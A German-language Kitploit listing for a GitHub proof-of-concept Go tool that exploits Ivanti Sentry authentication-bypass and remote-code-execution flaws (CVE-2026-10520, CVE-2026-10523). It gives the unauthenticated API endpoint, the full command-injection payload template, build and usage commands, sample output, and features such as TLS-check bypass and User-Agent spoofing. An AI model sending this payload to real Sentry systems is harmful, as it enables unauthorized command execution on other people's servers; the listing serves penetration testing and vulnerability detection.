Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-10523-Ivanti-sentry — Proof-of-Concept-Erkennungstool für Ivanti Sentry Authentifizierungsumgehung und Remote-Codeausführungs-Schwachstellen (CVE-2026-10520, CVE-2026-10523). Sendet manipulierte API-Anfragen, um Systembefehle auszuführen und verwundbare Bereitstellungen zu validieren. | Kitploit
Tools/GitHubGitHub/gagaltotal/cve-2026-10523-ivanti-sentry
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlAuthentifizierung
GitHubgagaltotal/cve-2026-10523-ivanti-sentry

CVE-2026-10523-Ivanti-sentry

Proof-of-Concept-Erkennungstool für Ivanti Sentry Authentifizierungsumgehung und Remote-Codeausführungs-Schwachstellen (CVE-2026-10520, CVE-2026-10523). Sendet manipulierte API-Anfragen, um Systembefehle auszuführen und verwundbare Bereitstellungen zu validieren.

Repository anzeigenWebseite
313vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-10523 - Ivanti Sentry RCE Erkennungstool

Ein umfassendes Proof-of-Concept-Erkennungstool zum Testen von Ivanti-Sentry-Schwachstellen im Zusammenhang mit Authentifizierungsumgehung und Remote-Codeausführung. Dieses Tool identifiziert Systeme, die anfällig für CVE-2026-10520 und CVE-2026-10523 sind.

Übersicht

Dieses Projekt dient dazu, zu erkennen und zu bestätigen, ob eine Ivanti-Sentry-Instanz anfällig für kritische Authentifizierungsumgehungs- und Remote-Codeausführungsfehler ist. Das Tool sendet speziell präparierte Nachrichten über den Ivanti-Sentry-API-Endpunkt, um Systembefehle auszuführen und die Ergebnisse zu extrahieren, sodass Sicherheitsforscher und Penetrationstester verwundbare Bereitstellungen identifizieren können.

Schwachstellendetails

CVE-2026-10520

Authentifizierungsumgehungs-Schwachstelle in Ivanti Sentry, die nicht authentifizierten Zugriff auf eingeschränkte API-Endpunkte ermöglicht.

CVE-2026-10523

Remote-Codeausführungs-Schwachstelle in Ivanti Sentry, die die Ausführung beliebiger Systembefehle über die Messaging-API in Kombination mit der Authentifizierungsumgehung erlaubt.

Funktionen

  • Nicht authentifizierte Erkennung von verwundbaren Ivanti-Sentry-Instanzen
  • Fähigkeit zur Ausführung von Systembefehlen zur Proof-of-Concept-Validierung
  • Unterstützung für HTTP- und HTTPS-Verbindungen mit TLS-Überprüfungsumgehung
  • Proxy-Unterstützung für Tests über zwischengeschaltete Systeme
  • Saubere Extraktion der Befehlsausgabe aus XML-Antworten
  • Sichere Fehlerbehandlung mit informativem Feedback
  • Konfigurierbare Timeout- und Antwortgrößenbeschränkungen
  • Anforderungen

    • Go 1.26.4 oder höher
    • Netzwerkzugriff auf die Ziel-Ivanti-Sentry-Instanz
    • Gültige Ziel-URL mit Protokoll (HTTP oder HTTPS)

    Installation

    Klonen Sie das Repository und wechseln Sie in das Projektverzeichnis:

    root@kitploit:~
    git clone https://github.com/gagaltotal/CVE-2026-10523-Ivanti-sentry
    cd CVE-2026-10523-Ivanti-sentry
    

    Initialisierung und Paketbibliothek abrufen

    root@kitploit:~
    go mod init CVE-2026-10523-Ivanti-sentry
    go mod tidy
    

    Erstellen Sie die ausführbare Datei:

    root@kitploit:~
    go build -o tot_poc tot_poc.go
    

    Verwendung

    Screen Capture

    Das Tool erfordert zwei obligatorische Parameter: Ziel-URL und auszuführenden Befehl.

    Grundlegende Verwendung

    Screen Capture

    Führen Sie einen einfachen Befehl auf dem Ziel aus:

    root@kitploit:~
    ./tot_poc -url https://target.example.com:8443 -cmd "uname -a"
    

    Befehlszeilenoptionen

    • -url (erforderlich): Basis-URL des Ziels inklusive Protokoll (z. B. https://127.0.0.1:8443)
    • -cmd (erforderlich): Auszuführender Befehl zur Schwachstellenerkennung (z. B. "uname -a", "id", "whoami")
    • -p oder -proxy (optional): Proxy-Adresse und Port für die Weiterleitung des Datenverkehrs (z. B. 127.0.0.1:8080)

    Verwendungsbeispiele

    Screen Capture

    Schwachstelle mit einfachem Systeminformationsbefehl erkennen:

    root@kitploit:~
    ./tot_poc -url https://192.168.1.100:8443 -cmd "uname -a"
    

    Mit Proxy-Konfiguration ausführen:

    root@kitploit:~
    ./tot_poc -url https://target.example.com:8443 -cmd "whoami" -proxy 127.0.0.1:8080
    

    Befehl zum Extrahieren von Systeminformationen ausführen:

    root@kitploit:~
    ./tot_poc -url https://sentry-instance.internal:8443 -cmd "cat /etc/os-release"
    

    Ausgabe

    Das Tool zeigt an:

    1. Ein Banner mit Schwachstelleninformationen
    2. Ziel-URL, Befehl und Proxy-Konfiguration (falls zutreffend)
    3. Echtzeit-Statusmeldungen, die den Fortschritt der Anfrage anzeigen
    4. Ergebnisse der Befehlsausführung, wenn das Ziel verwundbar ist
    5. Fehlermeldungen, wenn das Ziel nicht verwundbar ist oder die Verbindung fehlschlägt

    Erfolgreiche Erkennungsausgabe

    root@kitploit:~
    Target: https://192.168.1.100:8443
    Command: uname -a
    
    [+] Sending command execution check to: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
    [+] Target appears to be vulnerable.
    
    Command output:
    Linux sentry-server 5.10.0-8-generic x86_64 GNU/Linux
    

    Fehlgeschlagene Erkennungsausgabe

    root@kitploit:~
    Target: https://192.168.1.100:8443
    Command: uname -a
    
    [+] Sending command execution check to: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
    [-] Target does not appear to be vulnerable.
    

    Technische Details

    Angriffsvektor

    Das Tool nutzt den Endpunkt /mics/api/v2/sentry/mics-config/handleMessage, der ohne Authentifizierung zugänglich ist. Der Payload wird wie folgt aufgebaut:

    root@kitploit:~
    message=execute+system+/configuration/system/commandexec+<commandexec><index>1</index><reqandres>[COMMAND]</reqandres></commandexec>
    

    Die Antwort enthält die Befehlsausgabe im XML-Format innerhalb eines success-Tags.

    Sicherheitsfunktionen

    • TLS-Überprüfungsumgehung zum Testen selbstsignierter Zertifikate
    • Konfigurierbare HTTP-Timeouts, um hängende Anfragen zu vermeiden
    • Begrenzung der Antwortgröße (10 MB), um Speichererschöpfung zu verhindern
    • Angemessene Fehlerbehandlung für fehlerhafte Antworten
    • User-Agent-Spoofing, um einfache Erkennungsmechanismen zu umgehen

    Funktionsweise

    1. Analysiere Befehlszeilenargumente für Ziel-URL und Befehl
    2. Erstelle HTTP-Client mit optionaler Proxy-Konfiguration
    3. Erstelle Payload mit dem vom Benutzer bereitgestellten Befehl
    4. Sende POST-Anfrage an den verwundbaren Endpunkt
    5. Extrahiere Befehlsausgabe aus der XML-Antwortstruktur
    6. Zeige Ergebnisse oder Fehlermeldungen entsprechend an

    Haftungsausschluss

    Dieses Tool wird ausschließlich für autorisierte Sicherheitstests und Forschungszwecke bereitgestellt. Die Nutzer sind allein dafür verantwortlich, sicherzustellen, dass sie vor dem Testen von Systemen über die entsprechende Autorisierung verfügen. Unbefugter Zugriff auf Computersysteme ist illegal. Die Autoren übernehmen keine Haftung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.

    Anforderungen und Einschränkungen

    • Ziel muss eine verwundbare Ivanti-Sentry-Instanz sein
    • Netzwerkverbindung zum Zielsystem ist erforderlich
    • Standard-Timeout beträgt 10 Sekunden pro Anfrage
    • Maximale Antwortgröße ist auf 10 MB begrenzt
    • Nur wirksam auf Systemen, die verwundbare Versionen von Ivanti Sentry ausführen
    • TLS-Zertifikatsvalidierung ist zu Testzwecken deaktiviert

    Autor

    GhostGTR666 - Gagaltotal666

    Repository

    https://github.com/gagaltotal/CVE-2026-10523-Ivanti-sentry

    Lizenz

    Dieses Projekt wird wie besehen für Sicherheitsforschung und Bildungszwecke bereitgestellt.

    Referenzen

    • CVE-2026-10520: Ivanti Sentry Authentifizierungsumgehung
    • CVE-2026-10523: Ivanti Sentry Remote-Codeausführung
    Tool herunterladen